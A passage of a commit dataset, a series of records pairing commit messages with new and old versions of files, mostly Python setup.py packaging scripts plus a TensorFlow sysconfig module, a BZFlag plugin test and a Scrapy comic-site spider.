url='http://code.sixapart.com/svn/remoteobjects/',
)
|
bsd-3-clause
|
Python
|
|
7046a54abc31ecc919c628bd197600ac09437989
|
Make dependency versions consistent.
|
cloudendpoints/endpoints-python,inklesspen/endpoints-python,cloudendpoints/endpoints-python,inklesspen/endpoints-python
|
setup.py
|
setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
from setuptools import setup, find_packages
# Get the version
version_regex = r'__version__ = ["\']([^"\']*)["\']'
with open('endpoints/__init__.py', 'r') as f:
text = f.read()
match = re.search(version_regex, text)
if match:
version = match.group(1)
else:
raise RuntimeError("No version number found!")
install_requires = [
'google-endpoints-api-management>=1.1.1'
]
setup(
name='google-endpoints',
version=version,
description='Google Cloud Endpoints',
long_description=open('README.rst').read(),
author='Google Endpoints Authors',
author_email='googleapis-packages@google.com',
url='https://github.com/cloudendpoints/endpoints-python',
packages=find_packages(),
package_dir={'google-endpoints': 'endpoints'},
license='Apache',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: Implementation :: CPython',
],
scripts=['endpoints/endpointscfg.py'],
tests_require=['mox', 'protobuf', 'protorpc', 'pytest', 'webtest'],
install_requires=install_requires,
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
from setuptools import setup, find_packages
# Get the version
version_regex = r'__version__ = ["\']([^"\']*)["\']'
with open('endpoints/__init__.py', 'r') as f:
text = f.read()
match = re.search(version_regex, text)
if match:
version = match.group(1)
else:
raise RuntimeError("No version number found!")
install_requires = [
'google-endpoints-api-management>=1.0.0b1'
]
setup(
name='google-endpoints',
version=version,
description='Google Cloud Endpoints',
long_description=open('README.rst').read(),
author='Google Endpoints Authors',
author_email='googleapis-packages@google.com',
url='https://github.com/cloudendpoints/endpoints-python',
packages=find_packages(),
package_dir={'google-endpoints': 'endpoints'},
license='Apache',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: Implementation :: CPython',
],
scripts=['endpoints/endpointscfg.py'],
tests_require=['mox', 'protobuf', 'protorpc', 'pytest', 'webtest'],
install_requires=install_requires,
)
|
apache-2.0
|
Python
|
6d0f54db9654ffa02accb5c557e4d4a5952d0ba0
|
Add a setup.py
|
SS-RD/pkgcmp
|
setup.py
|
setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Import python libs
import os
import sys
if 'USE_SETUPTOOLS' in os.environ or 'setuptools' in sys.modules:
from setuptools import setup
else:
from distutils.core import setup
NAME = 'pkgcmp'
DESC = ('Automate the creation of a normalized cross distribution package naming database')
# Version info -- read without importing
_locals = {}
with open('pkgcmp/version.py') as fp:
exec(fp.read(), None, _locals)
VERSION = _locals['__version__']
setup(name=NAME,
version=VERSION,
description=DESC,
author='Thomas S Hatch',
author_email='thatch@saltstack.com',
url='https://saltstack.com',
classifiers=[
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
],
scripts=['scripts/pkgcmp'],
packages=[
'pkgcmp',
'pkgcmp.scanners',
'pkgcmp.dbs',
])
|
apache-2.0
|
Python
|
|
9aabb59303d59287f1f29119a03c979ca0aeaefc
|
Bump version number to 0.10.1
|
zardus/idalink,rhelmot/idalink,rhelmot/idalink
|
setup.py
|
setup.py
|
from setuptools import setup, find_packages
setup(
name='idalink',
description='An interface to the insides of IDA!',
long_description=open('README.md').read(),
version='0.10.1',
url='https://github.com/zardus/idalink',
license='GNU General Public License v3',
packages=find_packages(),
package_data={
'idalink': ['support/*'],
},
install_requires=[
'rpyc',
],
)
|
from setuptools import setup, find_packages
setup(
name='idalink',
description='An interface to the insides of IDA!',
long_description=open('README.md').read(),
version='0.10',
url='https://github.com/zardus/idalink',
license='GNU General Public License v3',
packages=find_packages(),
package_data={
'idalink': ['support/*'],
},
install_requires=[
'rpyc',
],
)
|
bsd-2-clause
|
Python
|
2894db47391d055978a0bbde485fd06ce59a4fa1
|
Add setup.py for the project's package management
|
anirbanroydas/ci-testing-python,anirbanroydas/ci-testing-python,anirbanroydas/ci-testing-python
|
setup.py
|
setup.py
|
# !/usr/bin/env python
#
# setup.py script
#
# copyright 2016 anirban roy das <anirban.nick@gmail.com>
#
#
# Always prefer setuptools over distutils
from setuptools import setup
# To use a consistent encoding
import codecs
import os
# ############## general config ##############
NAME = "ci_testing_python"
VERSION = '0.1'
PACKAGES = ["ci_testing_python", "ci_testing_python.app"]
PROJECT_URL = 'https://github.com/anirbanroydas/ci-testing-python'
AUTHOR = 'Anirban Roy Das'
EMAIL = 'anirban.nick@gmail.com'
KEYWORDS = ['ci', 'jenkins', 'docker', 'python', 'flask',
'testing', 'travis-ci', 'tox', 'pytest']
CLASSIFIERS = [
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Natural Language
'Natural Language :: English',
# Specify the operating systems it can work on
'Operating System :: OS Independent',
# Specify the Python versions you support here. In particular, ensure that
# you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: CPython',
]
INSTALL_REQUIRES = [
"Flask == 0.12",
"uwsgi == 2.0.14",
"requests == 2.13.0",
"redis == 2.10.5"
]
TEST_REQUIRES = [
"pytest == 3.0.6",
"pytest-flask == 0.10.0"
]
DEV_REQUIRES = [] + TEST_REQUIRES
EXTRAS_REQUIRE = {
'dev': DEV_REQUIRES,
'test': TEST_REQUIRES
}
PACKAGE_DATA = {
# data files need to be listed both here (which determines what gets
# installed) and in MANIFEST.in (which determines what gets included
# in the sdist tarball
"ci_testing_python": [],
}
# DATA_FILES =[]
HERE = os.path.abspath(os.path.dirname(__file__))
# ############ End of basic config ###########
# Get the long description from the README file
with codecs.open(os.path.join(HERE, 'README.rst'), 'rb', 'utf-8') as f:
LONG_DESCRIPTION = f.read()
# ### The main setup function ######
setup(
name=NAME,
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=VERSION,
description='A sample app in python for testing using flask, pytest, pytest-flask, uber\'s test doubles package with docker and ci environment - jenkins with docker',
long_description=LONG_DESCRIPTION,
# The project's main homepage.
url=PROJECT_URL,
# Author details
author=AUTHOR,
author_email=EMAIL,
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=CLASSIFIERS,
# What does your project relate to?
keywords=KEYWORDS,
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=PACKAGES,
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
# $ pip install .
install_requires=INSTALL_REQUIRES,
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
# NOTE: If you're using zsh you need to escape square, i.e $ pip install -e .\[dev,test\]
extras_require=EXTRAS_REQUIRE,
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .
test_suite='tests',
tests_require=TEST_REQUIRES,
# If set to True, this tells setuptools to automatically include
# any data files it finds inside your package directories that
# are specified by your MANIFEST.in file.
# include_package_data = True
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
package_data=PACKAGE_DATA,
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=DATA_FILES,
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [],
},
)
|
mit
|
Python
|
|
72e907ade08aa92f2a816c7a1d6511d125204dbc
|
Update package description
|
erichonkanen/django-rest-framework-jwt,coUrbanize/django-rest-framework-jwt,chrisjones-brack3t/django-rest-framework-jwt,GetBlimp/django-rest-framework-jwt,ayarshabeer/django-rest-framework-jwt,vvangelovski/django-rest-framework-jwt,vforgione/django-rest-framework-jwt,blaklites/django-rest-framework-jwt,sandipbgt/django-rest-framework-jwt,kbussell/django-rest-framework-jwt,shanemgrey/django-rest-framework-jwt,orf/django-rest-framework-jwt,diegueus9/django-rest-framework-jwt,liyocee/django-rest-framework-jwt,plentific/django-rest-framework-jwt,oasiswork/django-rest-framework-jwt,ArabellaTech/django-rest-framework-jwt,ticosax/django-rest-framework-jwt,ajostergaard/django-rest-framework-jwt,1vank1n/django-rest-framework-jwt,skurtapp/django-rest-framework-jwt,soichih/django-rest-framework-jwt,KetsuN/django-rest-framework-jwt,icewater246/django-rest-framework-jwt,abdulhaq-e/django-rest-framework-jwt,TrackMaven/django-rest-framework-jwt
|
setup.py
|
setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
import re
import os
import sys
name = 'djangorestframework-jwt'
package = 'rest_framework_jwt'
description = 'JSON Web Token based authentication for Django REST framework'
url = 'https://github.com/GetBlimp/django-rest-framework-jwt'
author = 'Jose Padilla'
author_email = 'jpadilla@getblimp.com'
license = 'BSD'
install_requires = open('requirements.txt').read().split('\n')
test_suite = 'rest_framework_jwt.runtests.runtests.main'
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]",
init_py, re.MULTILINE).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
version = get_version(package)
if sys.argv[-1] == 'publish':
os.system("python setup.py sdist upload")
os.system("python setup.py bdist_wheel upload")
print("You probably want to also tag the version now:")
print(" git tag -a {0} -m 'version {0}'".format(version))
print(" git push --tags")
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
test_suite=test_suite,
install_requires=install_requires
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
import re
import os
import sys
name = 'djangorestframework-jwt'
package = 'rest_framework_jwt'
description = ''
url = 'https://github.com/GetBlimp/django-rest-framework-jwt'
author = 'Jose Padilla'
author_email = 'jpadilla@getblimp.com'
license = 'BSD'
install_requires = open('requirements.txt').read().split('\n')
test_suite = 'rest_framework_jwt.runtests.runtests.main'
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]",
init_py, re.MULTILINE).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
version = get_version(package)
if sys.argv[-1] == 'publish':
os.system("python setup.py sdist upload")
os.system("python setup.py bdist_wheel upload")
print("You probably want to also tag the version now:")
print(" git tag -a {0} -m 'version {0}'".format(version))
print(" git push --tags")
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
test_suite=test_suite,
install_requires=install_requires
)
|
mit
|
Python
|
4646873ec80076759c02deac7ff3c50665e31415
|
Update the PyPI version to 0.2.12
|
Doist/todoist-python,electronick1/todoist-python
|
setup.py
|
setup.py
|
# -*- coding: utf-8 -*-
import os
from setuptools import setup
def read(fname):
try:
return open(os.path.join(os.path.dirname(__file__), fname)).read()
except:
return ''
setup(
name='todoist-python',
version='0.2.12',
packages=['todoist', 'todoist.managers'],
author='Doist Team',
author_email='info@todoist.com',
license='BSD',
description='todoist-python - The official Todoist Python API library',
long_description = read('README.md'),
install_requires=[
'requests',
],
# see here for complete list of classifiers
# http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=(
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
),
)
|
# -*- coding: utf-8 -*-
import os
from setuptools import setup
def read(fname):
try:
return open(os.path.join(os.path.dirname(__file__), fname)).read()
except:
return ''
setup(
name='todoist-python',
version='0.2.11',
packages=['todoist', 'todoist.managers'],
author='Doist Team',
author_email='info@todoist.com',
license='BSD',
description='todoist-python - The official Todoist Python API library',
long_description = read('README.md'),
install_requires=[
'requests',
],
# see here for complete list of classifiers
# http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=(
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
),
)
|
mit
|
Python
|
7efc61175c540a56b03e829ec917ce9efc1f06f9
|
Fix incorrect get_link_flags on Mac
|
frreiss/tensorflow-fred,aldian/tensorflow,gautam1858/tensorflow,paolodedios/tensorflow,petewarden/tensorflow,petewarden/tensorflow,ppwwyyxx/tensorflow,renyi533/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,yongtang/tensorflow,gunan/tensorflow,chemelnucfin/tensorflow,gunan/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,ppwwyyxx/tensorflow,ppwwyyxx/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,renyi533/tensorflow,arborh/tensorflow,aam-at/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,ppwwyyxx/tensorflow,chemelnucfin/tensorflow,tensorflow/tensorflow,arborh/tensorflow,annarev/tensorflow,jhseu/tensorflow,adit-chandra/tensorflow,Intel-tensorflow/tensorflow,ppwwyyxx/tensorflow,cxxgtxy/tensorflow,ppwwyyxx/tensorflow,renyi533/tensorflow,tensorflow/tensorflow,jhseu/tensorflow,paolodedios/tensorflow,arborh/tensorflow,annarev/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,jhseu/tensorflow,aam-at/tensorflow,Intel-Corporation/tensorflow,aldian/tensorflow,renyi533/tensorflow,adit-chandra/tensorflow,DavidNorman/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,DavidNorman/tensorflow,jhseu/tensorflow,DavidNorman/tensorflow,paolodedios/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,DavidNorman/tensorflow,davidzchen/tensorflow,yongtang/tensorflow,frreiss/tensorflow-fred,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,xzturn/tensorflow,annarev/tensorflow,gautam1858/tensorflow,adit-chandra/tensorflow,cxxgtxy/tensorflow,xzturn/tensorflow,paolodedios/tensorflow,xzturn/tensorflow,paolodedios/tensorflow,sarvex/tensorflow,aam-at/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,cxxgtxy/tensorflow,gautam1858/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,jhseu/tensorflow,Intel-Corporation/tensorflow,freedomtan/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,sarvex/tensorflow,annarev/tensorflow,Intel-tensorflow/tensorflow,petewarden/tensorflow,gunan/tensorflow,annarev/tensorflow,chemelnucfin/tensorflow,davidzchen/tensorflow,xzturn/tensorflow,adit-chandra/tensorflow,tensorflow/tensorflow-pywrap_saved_model,chemelnucfin/tensorflow,freedomtan/tensorflow,sarvex/tensorflow,adit-chandra/tensorflow,yongtang/tensorflow,frreiss/tensorflow-fred,annarev/tensorflow,yongtang/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,xzturn/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,petewarden/tensorflow,davidzchen/tensorflow,xzturn/tensorflow,frreiss/tensorflow-fred,aldian/tensorflow,gunan/tensorflow,paolodedios/tensorflow,chemelnucfin/tensorflow,gautam1858/tensorflow,karllessard/tensorflow,aam-at/tensorflow,jhseu/tensorflow,tensorflow/tensorflow-pywrap_saved_model,annarev/tensorflow,chemelnucfin/tensorflow,tensorflow/tensorflow-pywrap_saved_model,annarev/tensorflow,DavidNorman/tensorflow,DavidNorman/tensorflow,petewarden/tensorflow,aam-at/tensorflow,xzturn/tensorflow,adit-chandra/tensorflow,ppwwyyxx/tensorflow,Intel-tensorflow/tensorflow,renyi533/tensorflow,freedomtan/tensorflow,paolodedios/tensorflow,yongtang/tensorflow,gunan/tensorflow,gunan/tensorflow,frreiss/tensorflow-fred,aldian/tensorflow,adit-chandra/tensorflow,petewarden/tensorflow,tensorflow/tensorflow,Intel-Corporation/tensorflow,annarev/tensorflow,renyi533/tensorflow,davidzchen/tensorflow,frreiss/tensorflow-fred,gautam1858/tensorflow,chemelnucfin/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,adit-chandra/tensorflow,ppwwyyxx/tensorflow,gautam1858/tensorflow,Intel-tensorflow/tensorflow,chemelnucfin/tensorflow,yongtang/tensorflow,DavidNorman/tensorflow,arborh/tensorflow,freedomtan/tensorflow,tensorflow/tensorflow-pywrap_saved_model,cxxgtxy/tensorflow,davidzchen/tensorflow,frreiss/tensorflow-fred,gautam1858/tensorflow,annarev/tensorflow,xzturn/tensorflow,renyi533/tensorflow,aam-at/tensorflow,renyi533/tensorflow,gunan/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,sarvex/tensorflow,renyi533/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,aldian/tensorflow,karllessard/tensorflow,karllessard/tensorflow,paolodedios/tensorflow,Intel-Corporation/tensorflow,aam-at/tensorflow,tensorflow/tensorflow,DavidNorman/tensorflow,arborh/tensorflow,adit-chandra/tensorflow,davidzchen/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,frreiss/tensorflow-fred,paolodedios/tensorflow,ppwwyyxx/tensorflow,ppwwyyxx/tensorflow,karllessard/tensorflow,frreiss/tensorflow-fred,aam-at/tensorflow,gunan/tensorflow,sarvex/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,davidzchen/tensorflow,tensorflow/tensorflow-pywrap_saved_model,gunan/tensorflow,jhseu/tensorflow,annarev/tensorflow,chemelnucfin/tensorflow,davidzchen/tensorflow,karllessard/tensorflow,davidzchen/tensorflow,Intel-Corporation/tensorflow,xzturn/tensorflow,gunan/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,petewarden/tensorflow,aam-at/tensorflow,tensorflow/tensorflow,xzturn/tensorflow,karllessard/tensorflow,davidzchen/tensorflow,Intel-Corporation/tensorflow,chemelnucfin/tensorflow,DavidNorman/tensorflow,karllessard/tensorflow,tensorflow/tensorflow,aam-at/tensorflow,karllessard/tensorflow,jhseu/tensorflow,gautam1858/tensorflow,ppwwyyxx/tensorflow,aam-at/tensorflow,renyi533/tensorflow,gunan/tensorflow,freedomtan/tensorflow,tensorflow/tensorflow,Intel-Corporation/tensorflow,freedomtan/tensorflow,arborh/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,frreiss/tensorflow-fred,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,gunan/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-experimental_link_static_libraries_once,gautam1858/tensorflow,Intel-Corporation/tensorflow,jhseu/tensorflow,adit-chandra/tensorflow,DavidNorman/tensorflow,renyi533/tensorflow,chemelnucfin/tensorflow,ppwwyyxx/tensorflow,yongtang/tensorflow,gautam1858/tensorflow,arborh/tensorflow,frreiss/tensorflow-fred,chemelnucfin/tensorflow,aldian/tensorflow,jhseu/tensorflow,cxxgtxy/tensorflow,arborh/tensorflow,aldian/tensorflow,xzturn/tensorflow,Intel-tensorflow/tensorflow,DavidNorman/tensorflow,sarvex/tensorflow,gautam1858/tensorflow,cxxgtxy/tensorflow,arborh/tensorflow,sarvex/tensorflow,Intel-tensorflow/tensorflow,aam-at/tensorflow,xzturn/tensorflow,freedomtan/tensorflow,frreiss/tensorflow-fred,arborh/tensorflow,freedomtan/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,renyi533/tensorflow,adit-chandra/tensorflow,DavidNorman/tensorflow,jhseu/tensorflow,sarvex/tensorflow,davidzchen/tensorflow,jhseu/tensorflow,yongtang/tensorflow,freedomtan/tensorflow,cxxgtxy/tensorflow,adit-chandra/tensorflow,arborh/tensorflow,yongtang/tensorflow,gautam1858/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,davidzchen/tensorflow,aldian/tensorflow,Intel-tensorflow/tensorflow,petewarden/tensorflow,cxxgtxy/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,Intel-tensorflow/tensorflow,karllessard/tensorflow,karllessard/tensorflow,yongtang/tensorflow,arborh/tensorflow,petewarden/tensorflow
|
tensorflow/python/platform/sysconfig.py
|
tensorflow/python/platform/sysconfig.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""System configuration library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path as _os_path
import platform as _platform
from tensorflow.python.framework.versions import CXX11_ABI_FLAG as _CXX11_ABI_FLAG
from tensorflow.python.framework.versions import MONOLITHIC_BUILD as _MONOLITHIC_BUILD
from tensorflow.python.framework.versions import VERSION as _VERSION
from tensorflow.python.util.tf_export import tf_export
# pylint: disable=g-import-not-at-top
@tf_export('sysconfig.get_include')
def get_include():
"""Get the directory containing the TensorFlow C++ header files.
Returns:
The directory as string.
"""
# Import inside the function.
# sysconfig is imported from the tensorflow_core module, so having this
# import at the top would cause a circular import, resulting in
# the tensorflow_core module missing symbols that come after sysconfig.
import tensorflow_core as tf
return _os_path.join(_os_path.dirname(tf.__file__), 'include')
@tf_export('sysconfig.get_lib')
def get_lib():
"""Get the directory containing the TensorFlow framework library.
Returns:
The directory as string.
"""
import tensorflow_core as tf
return _os_path.join(_os_path.dirname(tf.__file__))
@tf_export('sysconfig.get_compile_flags')
def get_compile_flags():
"""Get the compilation flags for custom operators.
Returns:
The compilation flags.
"""
flags = []
flags.append('-I%s' % get_include())
flags.append('-D_GLIBCXX_USE_CXX11_ABI=%d' % _CXX11_ABI_FLAG)
return flags
@tf_export('sysconfig.get_link_flags')
def get_link_flags():
"""Get the link flags for custom operators.
Returns:
The link flags.
"""
is_mac = _platform.system() == 'Darwin'
ver = _VERSION.split('.')[0]
flags = []
if not _MONOLITHIC_BUILD:
flags.append('-L%s' % get_lib())
if is_mac:
flags.append('-ltensorflow_framework.%s' % ver)
else:
flags.append('-l:libtensorflow_framework.so.%s' % ver)
return flags
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""System configuration library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path as _os_path
import platform as _platform
from tensorflow.python.framework.versions import CXX11_ABI_FLAG as _CXX11_ABI_FLAG
from tensorflow.python.framework.versions import MONOLITHIC_BUILD as _MONOLITHIC_BUILD
from tensorflow.python.framework.versions import VERSION as _VERSION
from tensorflow.python.util.tf_export import tf_export
# pylint: disable=g-import-not-at-top
@tf_export('sysconfig.get_include')
def get_include():
"""Get the directory containing the TensorFlow C++ header files.
Returns:
The directory as string.
"""
# Import inside the function.
# sysconfig is imported from the tensorflow_core module, so having this
# import at the top would cause a circular import, resulting in
# the tensorflow_core module missing symbols that come after sysconfig.
import tensorflow_core as tf
return _os_path.join(_os_path.dirname(tf.__file__), 'include')
@tf_export('sysconfig.get_lib')
def get_lib():
"""Get the directory containing the TensorFlow framework library.
Returns:
The directory as string.
"""
import tensorflow_core as tf
return _os_path.join(_os_path.dirname(tf.__file__))
@tf_export('sysconfig.get_compile_flags')
def get_compile_flags():
"""Get the compilation flags for custom operators.
Returns:
The compilation flags.
"""
flags = []
flags.append('-I%s' % get_include())
flags.append('-D_GLIBCXX_USE_CXX11_ABI=%d' % _CXX11_ABI_FLAG)
return flags
@tf_export('sysconfig.get_link_flags')
def get_link_flags():
"""Get the link flags for custom operators.
Returns:
The link flags.
"""
is_mac = _platform.system() == 'Darwin'
ver = _VERSION.split('.')[0]
flags = []
if not _MONOLITHIC_BUILD:
flags.append('-L%s' % get_lib())
if is_mac:
flags.append('-l:libtensorflow_framework.%s.dylib' % ver)
else:
flags.append('-l:libtensorflow_framework.so.%s' % ver)
return flags
|
apache-2.0
|
Python
|
14a96a82209f21ca468a4f765c514ffd68f30f31
|
add my little test script, 'cuz why not
|
kongr45gpen/bzflag-import-1,kongr45gpen/bzflag-import-1,kongr45gpen/bzflag-import-1,kongr45gpen/bzflag-import-1,kongr45gpen/bzflag-import-1,kongr45gpen/bzflag-import-1
|
plugins/python/test.py
|
plugins/python/test.py
|
#!/usr/bin/env python
#
# Copyright (C) 2005 David Trowbridge
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
import BZFlag
print 'test'
BZFlag.SendTextMessage (0, 0, 'hello')
|
lgpl-2.1
|
Python
|
|
d22abe4ede958779a64c190bdd54451253eb2778
|
Add to model only if part of bunsen xxx
|
Iktwo/bunsen-scrapper
|
bunsenscrapper/spiders/bunsen.py
|
bunsenscrapper/spiders/bunsen.py
|
# -*- coding: utf-8 -*-
import scrapy
from bunsenscrapper.items import BunsenscrapperItem
from scrapy.http.request import Request
class BunsenSpider(scrapy.Spider):
name = "bunsen"
allowed_domains = ["bunsencomics.com"]
start_urls = (
'http://www.bunsencomics.com/?category=Bunsen+C%C3%B3mics',
)
def parse(self, response):
for sel in response.xpath('//article'):
item = BunsenscrapperItem()
item['title'] = sel.xpath('h1/a[contains(text(), "Bunsen")]/text()').extract()
item['link'] = sel.xpath('h1/a/@href').extract()
item['img'] = sel.css('.thumb-image').xpath('@data-src').extract()
isLinkGood = sel.xpath('h1/a/@href').re('bunsen-\d*$')
if isLinkGood and item['title']:
yield item
pass
next_link = response.xpath('//a[contains(text(), "Older")]/@href').extract()
if next_link:
yield Request('http://www.bunsencomics.com' + next_link[0], self.parse)
|
# -*- coding: utf-8 -*-
import scrapy
from bunsenscrapper.items import BunsenscrapperItem
from scrapy.http.request import Request
class BunsenSpider(scrapy.Spider):
name = "bunsen"
